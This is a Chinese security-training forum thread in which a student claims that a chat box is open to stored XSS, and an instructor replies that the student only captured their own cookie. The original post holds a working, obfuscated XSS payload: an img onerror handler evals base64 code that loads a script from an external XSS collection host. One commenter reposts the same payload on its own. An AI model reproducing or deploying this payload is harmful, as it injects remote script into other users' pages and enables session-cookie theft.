之前风哥上课说反射型xss不算,但在聊天框框里面输入<img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHMuc2IvckNRMCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>同样可以获取到聊天对象的cookie,该漏洞属于存储型xss
打赏我,让我更有动力~
Track-聂风 发表于 2021-6-18
同学你打到的是自己的Cookie,并不是聊天对象的Cookie.
加载数据中...
山屿云 发表于 2021-6-18
哈哈哈
spider 发表于 2021-6-19
自己打自己
1399546819 发表于 2021-6-21
<img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHMuc2IvckNRMCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>
二福 发表于 2021-8-22
哈哈
lunnam
用户组:Track 正式学员
积分:0 金币:7.00
主题: 1 帖子: 7
© 2016 - 2024 掌控者 All Rights Reserved.
Track-聂风
发表于 2021-6-18
同学你打到的是自己的Cookie,并不是聊天对象的Cookie.
评论列表
加载数据中...
山屿云
发表于 2021-6-18
哈哈哈
评论列表
加载数据中...
spider
发表于 2021-6-19
自己打自己
评论列表
加载数据中...
1399546819
发表于 2021-6-21
<img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHMuc2IvckNRMCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>
评论列表
加载数据中...
二福
发表于 2021-8-22
哈哈
评论列表
加载数据中...